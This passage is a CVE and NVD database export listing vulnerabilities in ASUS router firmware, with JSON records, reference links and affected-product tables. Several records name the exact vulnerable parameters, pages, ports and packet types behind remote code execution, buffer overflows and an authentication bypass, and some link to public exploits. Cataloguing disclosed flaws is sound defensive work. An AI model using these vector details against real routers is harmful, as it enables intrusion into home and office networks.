"https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2018-03-28T00:00:00", "descriptions": [ { "lang": "en", "value": "ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-04-20T19:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-8826", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/", "refsource": "CONFIRM", "url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/" }, { "name": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/" }, { "name": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/", "refsource": "CONFIRM", "url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-8826", "datePublished": "2018-04-20T20:00:00", "dateReserved": "2018-03-20T00:00:00", "dateUpdated": "2024-08-05T07:02:26.055Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-7997
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T09:48:25.555Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-01-28T04:33:24", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-7997", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68", "refsource": "MISC", "url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-7997", "datePublished": "2020-01-28T04:33:24", "dateReserved": "2020-01-26T00:00:00", "dateUpdated": "2024-08-04T09:48:25.555Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-6343
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html | x_refsource_MISC | |
http://osvdb.org/102267 | vdb-entry, x_refsource_OSVDB | |
https://support.t-mobile.com/docs/DOC-21994 | x_refsource_CONFIRM | |
http://www.exploit-db.com/exploits/31033 | exploit, x_refsource_EXPLOIT-DB | |
http://www.securityfocus.com/bid/65046 | vdb-entry, x_refsource_BID |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T17:39:01.283Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html" }, { "name": "102267", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/102267" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "name": "31033", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "http://www.exploit-db.com/exploits/31033" }, { "name": "65046", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/65046" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-01-21T00:00:00", "descriptions": [ { "lang": "en", "value": "Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-29T18:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html" }, { "name": "102267", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/102267" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "name": "31033", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "http://www.exploit-db.com/exploits/31033" }, { "name": "65046", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/65046" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-6343", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html", "refsource": "MISC", "url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html" }, { "name": "102267", "refsource": "OSVDB", "url": "http://osvdb.org/102267" }, { "name": "https://support.t-mobile.com/docs/DOC-21994", "refsource": "CONFIRM", "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "name": "31033", "refsource": "EXPLOIT-DB", "url": "http://www.exploit-db.com/exploits/31033" }, { "name": "65046", "refsource": "BID", "url": "http://www.securityfocus.com/bid/65046" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-6343", "datePublished": "2014-01-22T02:00:00", "dateReserved": "2013-11-01T00:00:00", "dateUpdated": "2024-08-06T17:39:01.283Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-9583
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.exploit-db.com/exploits/35688 | exploit, x_refsource_EXPLOIT-DB | |
https://www.exploit-db.com/exploits/44524/ | exploit, x_refsource_EXPLOIT-DB | |
https://support.t-mobile.com/docs/DOC-21994 | x_refsource_CONFIRM | |
https://github.com/jduck/asus-cmd | x_refsource_MISC | |
http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T13:47:41.675Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "35688", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "http://www.exploit-db.com/exploits/35688" }, { "name": "44524", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/44524/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/jduck/asus-cmd" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-10-30T00:00:00", "descriptions": [ { "lang": "en", "value": "common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-04-26T09:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "35688", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "http://www.exploit-db.com/exploits/35688" }, { "name": "44524", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/44524/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/jduck/asus-cmd" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2014-9583", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "35688", "refsource": "EXPLOIT-DB", "url": "http://www.exploit-db.com/exploits/35688" }, { "name": "44524", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/44524/" }, { "name": "https://support.t-mobile.com/docs/DOC-21994", "refsource": "CONFIRM", "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "name": "https://github.com/jduck/asus-cmd", "refsource": "MISC", "url": "https://github.com/jduck/asus-cmd" }, { "name": "http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2014-9583", "datePublished": "2015-01-08T20:00:00", "dateReserved": "2015-01-08T00:00:00", "dateUpdated": "2024-08-06T13:47:41.675Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-8879
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS | x_refsource_MISC | |
https://pagedout.institute/download/PagedOut_001_beta1.pdf | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:10:46.973Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://pagedout.institute/download/PagedOut_001_beta1.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-11-21T15:26:03", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS" }, { "tags": [ "x_refsource_MISC" ], "url": "https://pagedout.institute/download/PagedOut_001_beta1.pdf" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-8879", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS", "refsource": "MISC", "url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS" }, { "name": "https://pagedout.institute/download/PagedOut_001_beta1.pdf", "refsource": "MISC", "url": "https://pagedout.institute/download/PagedOut_001_beta1.pdf" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-8879", "datePublished": "2019-11-21T15:26:03", "dateReserved": "2018-03-20T00:00:00", "dateUpdated": "2024-08-05T07:10:46.973Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-4659
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html | x_refsource_MISC | |
http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:52:26.903Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2017-03-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-03-14T08:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-4659", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html", "refsource": "MISC", "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "name": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers", "refsource": "MISC", "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-4659", "datePublished": "2017-03-14T09:02:00", "dateReserved": "2013-06-24T00:00:00", "dateUpdated": "2024-08-06T16:52:26.903Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://starlabs.sg/advisories/18-20334/ | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://starlabs.sg/advisories/18-20334/ | Exploit, Third Party Advisory |
Vendor | Product | Version | |
---|---|---|---|
asus | asuswrt | 3.0.0.4.384.20308 | |
asus | gt-ac2900 | - | |
asus | gt-ac5300 | - | |
asus | gt-ax11000 | - | |
asus | rt-ac1200 | - | |
asus | rt-ac1200_v2 | - | |
asus | rt-ac1200g | - | |
asus | rt-ac1200ge | - | |
asus | rt-ac1750 | - | |
asus | rt-ac1750_b1 | - | |
asus | rt-ac1900p | - | |
asus | rt-ac3100 | - | |
asus | rt-ac3200 | - | |
asus | rt-ac51u | - | |
asus | rt-ac5300 | - | |
asus | rt-ac55u | - | |
asus | rt-ac56r | - | |
asus | rt-ac56s | - | |
asus | rt-ac56u | - | |
asus | rt-ac66r | - | |
asus | rt-ac66u | - | |
asus | rt-ac66u-b1 | - | |
asus | rt-ac66u_b1 | - | |
asus | rt-ac68p | - | |
asus | rt-ac68u | - | |
asus | rt-ac86u | - | |
asus | rt-ac87u | - | |
asus | rt-ac88u | - | |
asus | rt-acrh12 | - | |
asus | rt-acrh13 | - | |
asus | rt-ax3000 | - | |
asus | rt-ax56u | - | |
asus | rt-ax58u | - | |
asus | rt-ax88u | - | |
asus | rt-ax92u | - | |
asus | rt-g32 | - | |
asus | rt-n10\+d1 | - | |
asus | rt-n10e | - | |
asus | rt-n14u | - | |
asus | rt-n16 | - | |
asus | rt-n19 | - | |
asus | rt-n56r | - | |
asus | rt-n56u | - | |
asus | rt-n600 | - | |
asus | rt-n65u | - | |
asus | rt-n66r | - | |
asus | rt-n66u | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:asuswrt:3.0.0.4.384.20308:*:*:*:*:*:*:*", "matchCriteriaId": "4F4DB439-E9CC-4BA5-9A05-B51BF8DCD038", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:gt-ac2900:-:*:*:*:*:*:*:*", "matchCriteriaId": "B581C286-7C47-42BF-8876-243285409374", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:gt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D2B9867-7DA3-4221-9148-36FD412FA993", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:gt-ax11000:-:*:*:*:*:*:*:*", "matchCriteriaId": "CC02F598-C10E-4C77-9BE9-CB3660893C5E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200_v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "80BBA2CB-3DD3-4A8F-9556-E845AFAB2043", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200g:-:*:*:*:*:*:*:*", "matchCriteriaId": "1CF74439-AD6D-4BBB-9254-640170FE1CF3", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200ge:-:*:*:*:*:*:*:*", "matchCriteriaId": "2078161F-17EB-45EE-BCE9-C86B3860FD5C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*", "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1750_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "51FC355D-5C81-4041-B649-EB271CA55AFD", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1900p:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1E5EEF4-D19B-41D1-86B6-F2CBB745570E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*", "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2", "vulnerable": false }, { "criteria": 